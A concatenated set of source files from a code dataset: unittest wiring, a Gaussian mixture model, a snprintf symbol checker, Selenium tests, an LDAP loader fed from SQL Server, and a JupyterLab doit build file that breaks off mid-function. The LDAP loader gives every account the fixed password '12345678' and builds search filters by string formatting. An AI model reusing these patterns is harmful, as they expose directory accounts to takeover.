suite.addTest(TestACLs('test_modify_acls'))\n suite.addTest(TestACLs('test_delete_all_acls'))\n\n 
suite.addTest(TestWTPs('test_create_new_device_empty_body'))\n suite.addTest(TestWTPs('test_create_new_device_wrong_address'))\n suite.addTest(TestWTPs('test_create_new_device'))\n suite.addTest(TestWTPs('test_create_new_device_custom_desc'))\n suite.addTest(TestWTPs('test_update_device_desc'))\n\n suite.addTest(TestVBSes('test_create_new_device_empty_body'))\n suite.addTest(TestVBSes('test_create_new_device_wrong_address'))\n suite.addTest(TestVBSes('test_create_new_device'))\n suite.addTest(TestVBSes('test_create_new_device_custom_desc'))\n suite.addTest(TestVBSes('test_update_device_desc'))\n\n suite.addTest(TestWiFiSlices('test_create_new_wifi_slice'))\n suite.addTest(TestWiFiSlices('test_create_new_wifi_slice_after_prj'))\n suite.addTest(TestWiFiSlices('test_update_wifi_slice'))\n suite.addTest(TestWiFiSlices('test_delete_default_wifi_slice'))\n\n suite.addTest(TestLTESlices('test_create_new_lte_slice'))\n suite.addTest(TestLTESlices('test_create_new_lte_slice_after_prj'))\n suite.addTest(TestLTESlices('test_update_lte_slice'))\n suite.addTest(TestLTESlices('test_delete_default_lte_slice'))\n\n suite.addTest(TestApplications('test_register_new_app'))\n suite.addTest(TestApplications('test_register_new_app_fixed_uuid'))\n suite.addTest(TestApplications('test_register_new_app_duplicate_no_uuid'))\n suite.addTest(TestApplications('test_register_new_app_different_params'))\n suite.addTest(TestApplications('test_register_new_app_duplicate_uuid'))\n suite.addTest(TestApplications('test_register_existing_app_invalid_creds'))\n suite.addTest(TestApplications('test_register_existing_app'))\n suite.addTest(TestApplications('test_modify_app_invalid_param_name'))\n suite.addTest(TestApplications('test_modify_app_param'))\n suite.addTest(TestApplications('test_modify_app_invalid_param_value'))\n suite.addTest(TestApplications('test_register_new_app_parameters'))\n\n return suite\n\n\nif __name__ == '__main__':\n unittest.TextTestRunner().run(full_suite())\n","sub_path":"tests/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":5151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"555666613","text":"\"\"\"\r\nGaussian Mixture Model\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport scipy.misc as spmisc\r\n\r\nfrom ..prob_dists import MultiGauss\r\nfrom mu.cluster import *\r\n\r\n\r\nclass GMM():\r\n \"\"\" GMM implementation \"\"\"\r\n def __init__(self, X, K=50, n_iter=100):\r\n self.X = X\r\n self.N = self.X.shape[0]\r\n self.K = K\r\n self.n_iter = n_iter\r\n self.rz = None\r\n self.pi = None\r\n self.mu = None\r\n self.sigma = None\r\n\r\n def init_parameter(self, method='random'):\r\n if method == 'random':\r\n ## 乱数で初期化\r\n self.pi = np.ones(self.K) / self.K\r\n self.mu = np.random.rand( self.K, self.X.shape[1] ) * 2.0 - 1\r\n self.sigma = np.zeros( (self.K, self.X.shape[1], self.X.shape[1]), dtype=np.float64 )\r\n for k in range(self.K):\r\n self.sigma[k] = np.eye(self.X.shape[1])\r\n # self.sigma[k] = np.ones( (self.X.shape[1],self.X.shape[1]) )\r\n\r\n elif method == 'kmeans':\r\n ## k-means法で初期化\r\n whitenX = whiten_cy(self.X)\r\n label,center = kmeans_cy(whitenX, K=self.K, max_iter=50, n_rep=10)\r\n\r\n self.mu = center\r\n for k in range(self.K):\r\n cur_k_idx = np.where(label == k)[0]\r\n self.pi[k] = len(cur_k_idx)\r\n cur_k_obs = self.X[cur_k_idx]\r\n self.sigma[k] = np.cov(cur_k_obs)\r\n self.pi /= self.pi.sum()\r\n \r\n self.rz = np.zeros( (self.N,self.K), dtype=np.float64 )\r\n \r\n def train(self):\r\n \"\"\"\r\n 
パラメータ学習(EMアルゴリズム)\r\n \"\"\"\r\n\r\n ## initialize pi,mu,sigma\r\n self.init_parameter(method='random')\r\n\r\n for it in range(self.n_iter):\r\n print( 'iterates {0}'.format(it) )\r\n\r\n ## e-step: update rz\r\n for n in range(self.N):\r\n # 普通に計算する\r\n # gmm_pdfs = np.zeros(self.K)\r\n # for k in xrange(self.K):\r\n # gmm_pdfs[k] = self.pi[k] * MultiGauss(self.mu[k],self.sigma[k]).prob(self.X[n])\r\n\r\n # 対数領域にもっていってから計算する\r\n gmm_logpdfs = np.zeros(self.K)\r\n for k in range(self.K):\r\n gmm_logpdfs[k] = np.log(self.pi[k]) + MultiGauss(self.mu[k],self.sigma[k]).log_prob(self.X[n])\r\n gmm_pdfs = np.exp(gmm_logpdfs - spmisc.logsumexp(gmm_logpdfs))\r\n\r\n for k in range(self.K):\r\n self.rz[n,k] = gmm_pdfs[k] / gmm_pdfs.sum(0)\r\n\r\n # self.rz = np.maximum(self.rz, 1e-10)\r\n self.rz /= self.rz.sum(1)[:,np.newaxis]\r\n\r\n print('rz:')\r\n print(self.rz)\r\n print( self.rz.min() )\r\n\r\n ## m-step: update mu,sigma,pi\r\n Nk = self.rz.sum(0)\r\n for k in range(self.K):\r\n cur_rz = self.rz[:,k]\r\n self.mu[k] = 1.0/Nk[k] * (cur_rz[:,np.newaxis] * self.X ).sum(0)\r\n\r\n for k in range(self.K):\r\n cov_mat_sum = np.zeros( (self.X.shape[1],self.X.shape[1]), dtype=np.float64 )\r\n for n in range(self.N):\r\n cov_mat_sum += self.rz[n,k] * np.dot( (self.X[n]-self.mu[k])[:,np.newaxis], (self.X[n]-self.mu[k])[np.newaxis,:])\r\n # for d1 in xrange(self.X.shape[1]):\r\n # for d2 in xrange(self.X.shape[1]):\r\n # self.sigma[k,d1,d2] = ( self.rz[:,k] * (self.X[:,d1]-self.mu[k,d1]) * (self.X[:,d2]-self.mu[k,d2]) ).sum()\r\n self.sigma[k] = cov_mat_sum / Nk[k]\r\n\r\n # if linalg.det(self.sigma[k]) <= 0.0:\r\n # print 'det(Sigma)=0'\r\n # print self.sigma[k]\r\n\r\n for k in range(self.K):\r\n self.pi[k] = Nk[k] / float(self.N)\r\n\r\n print('pi:')\r\n print(self.pi)\r\n print('mu:')\r\n print(self.mu)\r\n print('sigma:')\r\n print(self.sigma)\r\n\r\n # L = self.likelihood(self.X)\r\n # print 'likelihood={0}'.format(L)\r\n\r\n def likelihood(self, X):\r\n \"\"\"\r\n データXに対するモデルの尤度を計算する\r\n \"\"\"\r\n L = 0.0\r\n if X.ndim == 2:\r\n N = X.shape[0]\r\n\r\n for n in range(N):\r\n gauss_sum = 0.0\r\n for k in range(self.K):\r\n gauss_sum += np.exp( np.log(self.pi[k]) + MultiGauss(self.mu[k],self.sigma[k]).log_prob(X[n]) )\r\n L += gauss_sum\r\n\r\n elif X.ndim == 1:\r\n for k in range(self.K):\r\n L += np.exp( np.log(self.pi[k]) + MultiGauss(self.mu[k],self.sigma[k]).log_prob(X) )\r\n\r\n def likelihood_1d(self, x):\r\n L = 0.0\r\n for k in range(self.K):\r\n L += np.exp( np.log(self.pi[k]) + MultiGauss(self.mu[k],self.sigma[k]).log_prob(x) )\r\n\r\n return L\r\n","sub_path":"mu/mixture/gmm.py","file_name":"gmm.py","file_ext":"py","file_size_in_byte":4962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"566401232","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. 
See the License for the\n# specific language governing permissions and limitations\n# under the License.\n#\n\n#\n# Stop cmake build if pn_i_xxx substitute functions aren't used for\n# the dangerous non-complying [v]snprintf family. A source of\n# painful bug-hunting.\n#\n# Each obj must be checked instead of just the dll since Visual Studio\n# sometimes inserts references to vsnprintf in DllMainCRTStartup,\n# causing false positives.\n#\n# bad: vsnprintf, __vsnprintf, _imp__vsnprintf, ..., same for snprintf\n# OK: vsnprintf_s, pn_i_vsnprintf\n#\n\nimport sys\nimport os\nimport subprocess\nimport glob\nimport re\n\ndef symcheck(objfile):\n\n symfile = objfile.replace('.obj', '.sym')\n cmd = ['dumpbin.exe', '/SYMBOLS', objfile, '/OUT:' + symfile]\n\n # /dev/null standin\n junk = open('junk', 'w')\n p = subprocess.Popen(cmd, stdout=junk)\n n = p.wait()\n if n != 0 :\n raise Exception(\"dumpbin call failure\")\n\n f = open(symfile, 'r')\n for line in f :\n m = re.search(r'UNDEF.*\\b([a-zA-Z_]*snprintf)\\b', line)\n if m :\n sym = m.group(1)\n if re.match(r'_*pni_v?snprintf', sym) is None :\n raise Exception('Unsafe use of C99 violating function in ' + objfile + ' : ' + sym)\n\ndef main():\n os.chdir(sys.argv[1])\n objs = glob.glob('*.obj')\n for obj in glob.glob('*.obj'):\n symcheck(obj)\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"tools/cmake/Modules/WindowsC99SymbolCheck.py","file_name":"WindowsC99SymbolCheck.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"577025177","text":"import inspect\nimport logging\nimport os\n\nfrom selenium.webdriver.common.by import By\n\nfrom Configuration.Base import BaseClass\nfrom Pages import homepage\nfrom Utility import logger as cl, StatusReport as st\nfrom Utility.util import utilities\nfrom testlib import commontestlib\nfrom testlib.navigation import nav\nfrom selenium import webdriver\n\nclass TestCricbuzz(BaseClass):\n log = cl.customlogger(loglevel=logging.INFO)\n\n def test_cricbuzz(self):\n hpage = homepage.Cribuzz_home(self.driver)\n navigation = nav(self.driver)\n Ver = st.status()\n clibs = commontestlib.commonlib(self.driver)\n self.log.info(\"Launch Crickbuzz web Application\")\n navigation.launch_App()\n title = hpage.homePageTitle()\n cricbuzz = \"Cricbuzz\"\n self.log.info(\"Titile is : %s \", title)\n self.log.info(\"Verify that lauched application title is \\'Cricbuzz\\'\")\n self.log.info(\"#####Cricbuzz Title Verification#####\")\n ver1 = False\n if cricbuzz in title:\n ver1 = True\n Ver.Verify_result(result=ver1, msg=\"Cricbuzz Title \")\n self.log.info(\"We have successfully launched cricbuzz\")\n\n self.log.info(\"#####Cricbuzz logo Verification#####\")\n clogo_type = hpage.get_logo_type()\n ver2 = False\n if clogo_type == \"image\":\n ver2 = True\n Ver.Verify_result(result=ver2, msg=\"Cricbuzz logo \")\n clibs.screenShot(\"Cricbuzz logo Verification\")\n\n\n def test_WomenRanking(self):\n clibs = commontestlib.commonlib(self.driver)\n hpage = homepage.Cribuzz_home(self.driver)\n navigation = nav(self.driver)\n Ver = st.status()\n self.log.info(\"#####Verify that Women's Ranking page is displayed.######\")\n clibs.nav_Rankings()\n clibs.select_womenRankings()\n page_heading = self.driver.find_element(By.CSS_SELECTOR, \".cb-nav-main h1.cb-nav-hdr\")\n Ver.verify_text(expected_text=\"ICC Cricket Rankings - Women's Batting\", actual_text=page_heading.text,\n msg='Women Ranking page')\n\n def test_MenRanking(self):\n 
clibs = commontestlib.commonlib(self.driver)\n hpage = homepage.Cribuzz_home(self.driver)\n navigation = nav(self.driver)\n Ver = st.status()\n self.log.info(\"#####Verify that Mens Ranking page is displayed.######\")\n clibs.nav_Rankings()\n clibs.select_mensRanking()\n\n page_heading = self.driver.find_element(By.CSS_SELECTOR, \".cb-nav-main h1.cb-nav-hdr\")\n Ver.verify_text(expected_text=\"ICC Cricket Rankings - Men's Batting\",actual_text=page_heading.text,msg='Mens Ranking page')\n\n def test_TopRanking_player(self):\n clibs = commontestlib.commonlib(self.driver)\n hpage = homepage.Cribuzz_home(self.driver)\n navigation = nav(self.driver)\n Ver = st.status()\n clibs.nav_Rankings()\n clibs.select_mensRanking()\n player_rank_dict = clibs.get_Rank_detail()\n for player,rank in player_rank_dict.items():\n if rank == \"1\":\n self.log.info(\"%s is the top ranking test player\", player)\n top_ranking_player = player\n break\n Ver.verify_text(expected_text=\"Joe Root\",actual_text=top_ranking_player, msg='Top Ranking Player')\n\n def test_playerranking(self):\n clibs = commontestlib.commonlib(self.driver)\n hpage = homepage.Cribuzz_home(self.driver)\n navigation = nav(self.driver)\n Ver = st.status()\n self.log.info(\"#####Verify that Rohit Sharma is in the top 5 best Test player list#####\")\n rank = hpage.get_player_Rank(\"Rohit Sharma\")\n Ver.verify_Num_Condition(10,rank,\"lt\", \"Rohit Sharma is in the top 5 best Test Day player list\")\n utilities.get_testcaseName()\n\n\n\n\n\n\n","sub_path":"Crickbuzz/tests/test_cricbuzz.py","file_name":"test_cricbuzz.py","file_ext":"py","file_size_in_byte":3805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"640876381","text":"import yaml\n\nif __name__ == \"__main__\":\n from dependences.sqlserver_manager import ConnectionManager\nelse:\n from app.ldif_from_database.dependences.sqlserver_manager import ConnectionManager\n\nimport os\nimport ldif\nimport unidecode\nimport ldap\nfrom ldap import modlist\n\nldap_server = ldap.initialize('ldap://10.6.143.50')\n\nadmin_password = os.getenv(\"LDAP_ADMIN_PASSWORD\")\n\nldap_server.simple_bind_s('cn=admin,dc=uh,dc=cu', admin_password)\n\n\nclass MyLDIF(ldif.LDIFParser):\n def __init__(self, input):\n ldif.LDIFParser.__init__(self,input)\n\n def handle(self,dn,entry):\n try:\n ldif = modlist.addModlist(entry)\n ldap_server.add_s(dn, ldif)\n except Exception:\n basedn = \"ou=Trabajadores,dc=uh,dc=cu\"\n worker = ldap_server.search_s(basedn, ldap.SCOPE_ONELEVEL, \"(&(ci=%s)(objectclass=%s))\" % (entry[\"ci\"][0].decode('utf8'), \"Trabajador\"))\n ldif = modlist.modifyModlist(worker[0][1], entry)\n ldap_server.modify_s(dn, ldif)\n \n\nclass LDIFFromSQLServer:\n \"\"\"Encapsulation for methods wich populate and modify the ldap server\n from a sql server database.\"\"\"\n\n def __init__(self, config_yml_path, firstUidNumber):\n \"\"\"Receives the path to the config file\"\"\"\n self.__uidNumber = firstUidNumber\n self.connection_handler = ConnectionManager(config_yml_path)\n with open(config_yml_path, 'r') as stream:\n try:\n config_obj = yaml.safe_load(stream)\n self.__workers_schema = config_obj[\"workers_schema\"]\n except yaml.YAMLError:\n perror('Error while parsing the config yml file in LDIFFromSQLServer!')\n\n def generate_ldif(self, restore=False, number_of_rows=0):\n \"\"\"Generates the ldif file from the database to populate the ldap\n for the first time overriding existing data.\n The optional second parameter defines wheter the database is 
restored or not.\n The third parameter is for testing and should be ignored.\"\"\"\n if restore:\n self.connection_handler.restore()\n cursor = self.connection_handler.execute_sql_query(\n 'SELECT No_CI, Nombre, Sexo, Apellido_1, Apellido_2, Desc_Cargo, Desc_Direccion '\n 'FROM ((Nomina_UH.dbo.Empleados_Gral e '\n 'INNER JOIN Nomina_UH.dbo.RH_Cargos g ON g.Id_Cargo = e.Id_Cargo) '\n 'INNER JOIN Nomina_UH.dbo.RH_Plantilla_Plazas p '\n 'ON g.Id_Cargo = p.Id_Cargo and e.Id_Direccion = p.Id_Direccion) '\n 'INNER JOIN Nomina_UH.dbo.RH_Plantilla r '\n 'ON r.Id_Direccion = p.Id_Direccion '\n 'GROUP BY No_CI, Nombre, Sexo, Apellido_1, Apellido_2, Desc_Cargo, Desc_Direccion')\n\n with open(\"./output/workers.ldif\", \"w+\") as f:\n row_number = 1\n uidNumber = self.__uidNumber\n # Limited count ?\n if number_of_rows > 0:\n rows_left = number_of_rows\n for row in cursor:\n self.__process_row(row, f, row_number, uidNumber)\n row_number += 1\n rows_left -= 1\n if rows_left == 0:\n break\n uidNumber+=1\n else:\n for row in cursor:\n self.__process_row(row, f, row_number, uidNumber)\n row_number += 1\n uidNumber+=1\n\n # populate ldap\n parser = MyLDIF(open('/api/app/ldif_from_database/output/workers.ldif', 'rb'))\n parser.parse()\n\n return uidNumber\n\n def generate_modify_population(self):\n \"\"\"Generates the ldif file from the database to modify\n the ldap keeping unmodified data untouched.\"\"\"\n raise NotImplementedError\n\n def __get_uid(self, name, last_name, second_last_name):\n name = unidecode.unidecode(name)\n last_name = unidecode.unidecode(last_name)\n second_last_name = unidecode.unidecode(second_last_name)\n\n name = name.split()[0].lower()\n last_name = last_name.split(' ')[0].lower()\n second_last_name = second_last_name.split(' ')[0].lower()\n basedn = \"ou=Trabajadores,dc=uh,dc=cu\"\n possible_uid = name + '.' + last_name\n\n if len(ldap_server.search_s(basedn, ldap.SCOPE_ONELEVEL, \"(&(uid=%s)(objectclass=%s))\" % (possible_uid, \"Trabajador\"))):\n possible_uid = name + '.' +second_last_name\n if len(ldap_server.search_s(basedn, ldap.SCOPE_ONELEVEL, \"(&(uid=%s)(objectclass=%s))\" % (possible_uid, \"Trabajador\"))):\n for i in range(1,1000):\n possible_uid = name + '.' 
+second_last_name +str(i)\n if len(ldap_server.search_s(basedn, ldap.SCOPE_ONELEVEL, \"(&(uid=%s)(objectclass=%s))\" % (possible_uid, \"Trabajador\"))):\n continue\n uid = possible_uid\n break\n else:\n uid = possible_uid\n else:\n uid = possible_uid\n\n return uid\n\n def __process_row(self, row, open_file, row_number, uidNumber):\n uid_to_use = ''\n basedn = \"ou=Trabajadores,dc=uh,dc=cu\"\n query_results = ldap_server.search_s(basedn, ldap.SCOPE_ONELEVEL, \"(&(ci=%s)(objectclass=%s))\" % (str(row[0]).strip(), \"Trabajador\"))\n # IF is there...\n email_to_use = ''\n if len(query_results):\n uid_to_use = query_results[0][1][\"uid\"][0].decode('utf8')\n try:\n email_to_use = query_results[0][1][\"Correo\"][0].decode('utf8')\n except Exception:\n pass\n\n else:\n uid_to_use = str(self.__get_uid(str(row[1]), str(row[3]), str(row[4])))\n\n open_file.write(\"# Entry %d: \\n\" % row_number)\n open_file.write(\"%s: %s\\n\" % ('dn','uid='+uid_to_use+',ou=Trabajadores,dc=uh,dc=cu'))\n for entry in self.__workers_schema:\n if type(entry[1]) == list:\n open_file.write(\"%s: %s\\n\" % (entry[0], ' '.join([str(row[x]) for x in entry[1]])))\n else:\n open_file.write(\"%s: %s\\n\" % (entry[0], str(row[entry[1]])))\n \n # Entries outside the database\n open_file.write(\"%s: %s\\n\" % ('objectclass', 'Trabajador'))\n open_file.write(\"%s: %s\\n\" % ('objectclass', 'posixAccount'))\n open_file.write(\"%s: %s\\n\" % ('objectclass', 'shadowAccount'))\n open_file.write(\"%s: %s\\n\" % ('uidNumber', move_first_ceros(str(row[0]).strip())))\n open_file.write(\"%s: %d\\n\" % ('gidNumber', 10000))\n open_file.write(\"%s: %s\\n\" % ('userPassword', '12345678'))\n open_file.write(\"%s: %s\\n\" % ('homeDirectory', '/home/'+uid_to_use+'/'))\n open_file.write(\"%s: %s\\n\" % ('uid', uid_to_use))\n if len(email_to_use):\n open_file.write(\"%s: %s\\n\" % ('correo', email_to_use))\n\n open_file.write(\"\\n\")\n pass\n\n\ndef perror(msg, exit_status=1):\n print(msg)\n exit(exit_status)\n\ndef move_first_ceros(ci):\n while ci[0] == '0':\n ci = ci[1:] + ci[0]\n return ci\n\nif __name__ == \"__main__\":\n handler = LDIFFromSQLServer(\"config.yml\", 5000)\n handler.generate_ldif(number_of_rows=11, restore=False)\n","sub_path":"apps/ldap_api/app/ldif_from_database/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"185056413","text":"# change the URLs in `./repos.yml`\nimport os\nimport pathlib\nimport doit.tools\nimport json\nimport shutil\nimport sys\nimport subprocess\nfrom yaml import safe_load\n\nDOIT_CONFIG = {\n \"backend\": \"sqlite3\",\n \"verbosity\": 2,\n \"par_type\": \"thread\",\n}\n\nos.environ.update(\n NODE_OPTS=\"--max-old-space-size=4096\",\n PIP_DISABLE_PIP_VERSION_CHECK=\"1\",\n PIP_IGNORE_INSTALLED=\"1\",\n PIP_NO_BUILD_ISOLATION=\"1\",\n PIP_NO_DEPENDENCIES=\"1\",\n PYTHONIOENCODING=\"utf-8\",\n PYTHONUNBUFFERED=\"1\",\n)\n\nHERE = pathlib.Path(__file__).parent\n\n# don't pollute the global state\nLINKS = (HERE / \"repos/.yarn-links\").resolve()\nYARN = [\"yarn\", \"--link-folder\", LINKS]\nPIP = [\"python\", \"-m\", \"pip\"]\n\nLAB_APP_DIR = pathlib.Path(sys.prefix) / \"share/jupyter/lab\"\nLAB_APP_STATIC = LAB_APP_DIR / \"static\"\nLAB_APP_INDEX = LAB_APP_STATIC / \"index.html\"\n\nREPOS_YML = HERE / \"repos.yml\"\nREPOS = safe_load(REPOS_YML.read_text())[\"repos\"]\nPATHS = {name: HERE / \"repos\" / name for name in REPOS}\n\n\nMISSING_LUMINO_DOCS = [\n 
\"default-theme\",\n # TODO: https://github.com/jupyterlab/lumino/issues/154\n \"polling\",\n]\n\n\ndef task_lint():\n \"\"\"lint the source in _this_ repo\"\"\"\n all_py = [*HERE.glob(\"*.py\")]\n yield dict(\n name=\"py\",\n doc=\"apply python source formatting and basic checking\",\n file_dep=[*all_py],\n actions=[do(\"black\", *all_py), do(\"flake8\", \"--max-line-length=88\", *all_py)],\n )\n\n\n# add targets to the docstring to include in the dev build.\ndef task_clone():\n \"\"\"clone all the repos defined in `repos.yml`\"\"\"\n for name, spec in REPOS.items():\n path = PATHS[name]\n config = path / \".git/config\"\n head = path / \".git/HEAD\"\n\n yield dict(\n name=f\"{name}:init\",\n file_dep=[REPOS_YML],\n actions=[]\n if path.exists()\n else [\n (doit.tools.create_folder, [path]),\n do(\"git\", \"init\", \"-b\", \"work\", cwd=path),\n do(\"git\", \"remote\", \"add\", \"origin\", spec[\"origin\"], cwd=path),\n do(\"git\", \"config\", \"user.email\", \"a11y@jupyter.org\", cwd=path),\n do(\"git\", \"config\", \"advice.detachedHead\", \"false\", cwd=path),\n ],\n targets=[config],\n )\n\n refs = spec[\"refs\"]\n for i, ref in enumerate(refs):\n task_dep = []\n actions = [do(\"git\", \"fetch\", \"origin\", ref[\"ref\"], cwd=path)]\n commit = ref.get(\"commit\") or ref[\"ref\"]\n targets = []\n if i == 0:\n actions += [do(\"git\", \"checkout\", \"-f\", commit, cwd=path)]\n else:\n prev = refs[i - 1]\n task_dep += [f\"\"\"clone:{name}:fetch:{i-1}:{prev[\"ref\"]}\"\"\"]\n actions += [do(\"git\", \"merge\", \"--commit\", commit, cwd=path)]\n\n if i == len(refs) - 1:\n targets = [head]\n\n yield dict(\n name=f\"\"\"{name}:fetch:{i}:{ref[\"ref\"]}\"\"\",\n file_dep=[config],\n targets=targets,\n task_dep=task_dep,\n actions=actions,\n )\n\n\ndef task_setup():\n \"\"\"ensure a working build of repos\"\"\"\n for name, path in PATHS.items():\n head = path / \".git/HEAD\"\n pkg_json = path / \"package.json\"\n\n if pkg_json.exists():\n yield dict(\n name=f\"{name}:yarn:install\",\n file_dep=[pkg_json, head],\n actions=[do(*YARN, cwd=path)],\n targets=yarn_integrity(path),\n )\n\n setup_py = path / \"setup.py\"\n\n if setup_py.exists():\n py_deps = [head, setup_py] + (\n yarn_integrity(path) if pkg_json.exists() else []\n )\n yield dict(\n name=f\"{name}:pip:install\",\n file_dep=py_deps,\n actions=[\n do(*PIP, \"uninstall\", \"-y\", path.name, cwd=path),\n do(*PIP, \"install\", \"-e\", \".\", cwd=path),\n do(*PIP, \"check\"),\n ],\n )\n if path == PATHS.get(\"jupyterlab\"):\n yield dict(\n name=f\"server:{path.name}\",\n file_dep=py_deps,\n task_dep=[f\"setup:{name}:pip:install\"],\n actions=server_extensions(path),\n )\n\n if pkg_json.exists():\n yield dict(\n name=f\"{name}:yarn:build\",\n file_dep=yarn_integrity(path),\n actions=[do(*YARN, \"build\", cwd=path)],\n targets=list(path.glob(\"packages/*/lib/*.js\")),\n **(\n dict(task_dep=[f\"setup:{name}:pip:install\"])\n if setup_py.exists()\n else {}\n ),\n )\n\n\ndef task_link():\n \"\"\"link yarn packages across the repos\"\"\"\n # go to the direction and links the packages.\n lumino = PATHS.get(\"lumino\")\n lab = PATHS.get(\"jupyterlab\")\n\n if not (lumino and lab):\n return\n\n for pkg_json in lumino.glob(\"packages/*/package.json\"):\n pkg = pkg_json.parent\n pkg_data = json.loads(pkg_json.read_text(encoding=\"utf-8\"))\n pkg_name = pkg_data[\"name\"]\n out_link = LINKS / pkg_data[\"name\"] / \"package.json\"\n in_link = lab / f\"node_modules/{pkg_name}/package.json\"\n yield dict(\n name=pkg_name,\n 
file_dep=[*yarn_integrity(lumino), *yarn_integrity(lab), pkg_json],\n actions=[(doit.tools.create_folder, [LINKS]), do(*YARN, \"link\", cwd=pkg)],\n targets=[out_link],\n )\n\n yield dict(\n name=f\"lab:{pkg_name}\",\n uptodate=[\n doit.tools.config_changed(\n {\n pkg_name: (\n in_link.exists() and in_link.resolve() == pkg_json.resolve()\n )\n }\n )\n ],\n file_dep=[out_link],\n actions=[do(*YARN, \"link\", pkg_name, cwd=lab)],\n )\n\n\ndef task_app():\n \"\"\"rebuild apps with live modifications\"\"\"\n lab = PATHS.get(\"jupyterlab\")\n\n if lab:\n dev_mode = lab / \"dev_mode\"\n dev_static = dev_mode / \"static\"\n dev_index = dev_static / \"index.html\"\n\n yield dict(\n name=\"build\",\n doc=\"do a dev build of the current jupyterlab source\",\n file_dep=[\n *LINKS.glob(\"*/package.json\"),\n *LINKS.glob(\"*/*/package.json\"),\n *sum(\n [[*repo.glob(\"packages/*/lib/*.js\")] for repo in PATHS.values()],\n [],\n ),\n ],\n actions=[\n do(*YARN, \"clean\", cwd=dev_mode),\n do(*YARN, \"build:prod\", cwd=dev_mode),\n ],\n targets=[dev_index],\n )\n\n yield dict(\n name=\"deploy\",\n doc=\"deploy the build dev application to $PREFIX/share/jupyter/lab\",\n file_dep=[dev_index],\n actions=[\n lambda: [shutil.rmtree(LAB_APP_DIR, ignore_errors=True), None][-1],\n (doit.tools.create_folder, [LAB_APP_DIR]),\n lambda: [\n shutil.copytree(dev_mode / subdir, LAB_APP_DIR / subdir)\n for subdir in [\"static\", \"schemas\", \"templates\", \"themes\"]\n ]\n and None,\n ],\n targets=[LAB_APP_INDEX],\n )\n\n\ndef task_docs():\n \"\"\"build documentation\"\"\"\n for path in PATHS.values():\n if not path.exists():\n continue\n\n if path == PATHS.get(\"jupyterlab\"):\n tsdoc_index = path / \"docs/api/index.html\"\n yield dict(\n name=\"\"\"jupyterlab:html:typedoc\"\"\",\n doc=\"build JupyterLab TypeScript API docs\",\n file_dep=[*path.rglob(\"src/**/*.ts\"), path / \"package.json\"],\n actions=[do(*YARN, \"docs\", cwd=path)],\n targets=[tsdoc_index],\n )\n\n lab_docs = path / \"docs\"\n lab_docs_src = lab_docs / \"source\"\n conf_py = lab_docs_src / \"conf.py\"\n yield dict(\n name=\"jupyterlab:html:sphinx\",\n doc=\"build JupyterLab docs (with a sitemap)\",\n file_dep=[\n tsdoc_index,\n *lab_docs_src.rglob(\"*.rst\"),\n *lab_docs_src.rglob(\"*.css\"),\n *lab_docs_src.rglob(\"*.js\"),\n ],\n actions=[\n (patch_sphinx_sitemap, [conf_py]),\n do(\n \"sphinx-build\",\n \"-b\",\n \"html\",\n \"source\",\n \"build/html\",\n cwd=path / \"docs\",\n ),\n ],\n targets=[\n path / \"docs/build/html/.buildinfo\",\n path / \"docs/build/html/index.html\",\n path / \"docs/build/html/sitemap.xml\",\n ],\n )\n\n if path == PATHS.get(\"lumino\"):\n lm_pkgs = sorted([p.parent for p in path.glob(\"packages/*/package.json\")])\n lm_docs = [\n path / f\"docs/api/{p.name}/index.html\"\n for p in lm_pkgs\n if p.name not in MISSING_LUMINO_DOCS\n ]\n lm_index = path / \"docs/api/index.html\"\n yield dict(\n name=\"\"\"lumino:html:typedoc\"\"\",\n doc=\"build Lumino TypeScript API docs\",\n file_dep=[*path.rglob(\"packages/*/src/**/*.ts\"), path / \"package.json\"],\n targets=lm_docs,\n actions=[do(*YARN, \"docs\", cwd=path)],\n )\n\n lm_index_text = \"\\n\".join(\n [\n \"\"\"\n \n \n Lumino API Documentation\n
Lumino API Documentation\n \"\"\",\n *[\n f\"\"\"\n {p.name.title()}\n \"\"\"\n for p in lm_pkgs\n if p.name not in MISSING_LUMINO_DOCS\n ],\n \"\"\"
      \"\"\",\n ]\n )\n\n yield dict(\n name=\"\"\"lumino:html:index\"\"\",\n doc=\"build lumino docs index\",\n file_dep=[*lm_docs],\n actions=[lambda: [lm_index.write_text(lm_index_text), None][-1]],\n targets=[lm_index],\n )\n\n\ndef task_start():\n \"\"\"start applications\"\"\"\n if \"jupyterlab\" in REPOS:\n yield dict(\n name=\"jupyterlab\",\n uptodate=[lambda: False],\n file_dep=[LAB_APP_INDEX],\n actions=[run_jupyterlab()],\n )\n\n\n# utilities\n\n\ndef do(*args, cwd=HERE, **kwargs):\n \"\"\"wrap a CmdAction for consistency\"\"\"\n return doit.tools.CmdAction(list(args), shell=False, cwd=str(pathlib.Path(cwd)))\n\n\ndef yarn_integrity(repo):\n \"\"\"get the file created after yarn install\"\"\"\n return [repo / \"node_modules/.yarn-integrity\"]\n\n\ndef server_extensions(repo):\n \"\"\"enable server( )extensions in a repo\"\"\"\n enable = [\"enable\", \"--py\", repo.name, \"--sys-prefix\"]\n apps = [\"serverextension\"], [\"server\", \"extension\"]\n return sum(\n [[do(\"jupyter\", *app, *enable), do(\"jupyter\", *app, \"list\")] for app in apps],\n [],\n )\n\n\ndef run_jupyterlab():\n \"\"\"start a jupyterlab application\"\"\"\n\n def jupyterlab():\n args = [\"jupyter\", \"lab\", 